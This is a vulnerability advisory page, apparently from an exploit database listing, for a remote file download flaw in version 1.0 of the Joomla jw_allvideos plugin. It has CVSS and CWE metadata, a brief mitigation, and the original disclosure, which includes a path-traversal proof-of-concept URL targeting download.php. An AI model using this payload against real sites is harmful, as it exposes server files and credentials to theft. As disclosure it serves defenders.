Joomla (jw_allvideos Plugin) Remote File Download Vulnerability

vendor:

jw_allvideos Plugin

by:

Pouya Daneshmand

6,4

CVSS

MEDIUM

Remote File Download

434

CWE

Product Name: jw_allvideos Plugin

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:joomla:joomla:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Joomla (jw_allvideos Plugin) Remote File Download Vulnerability

A vulnerability in the Joomla jw_allvideos plugin allows an attacker to download arbitrary files from the server. This is due to the lack of input validation in the download.php file, which allows an attacker to craft a malicious URL and download any file from the server.

Mitigation:

Input validation should be implemented in the download.php file to prevent attackers from downloading arbitrary files from the server.

Source

Exploit-DB raw data:

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Joomla (jw_allvideos Plugin)
# Version: 1.0
#################################################################
# Vulnerability Info:
# Type: Remote File Download
# Risk: Medium
#################################################################
# Vulnerability:
# http://site.com/plugins/content/jw_allvideos/includes/download.php?file=./../.../file.php
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################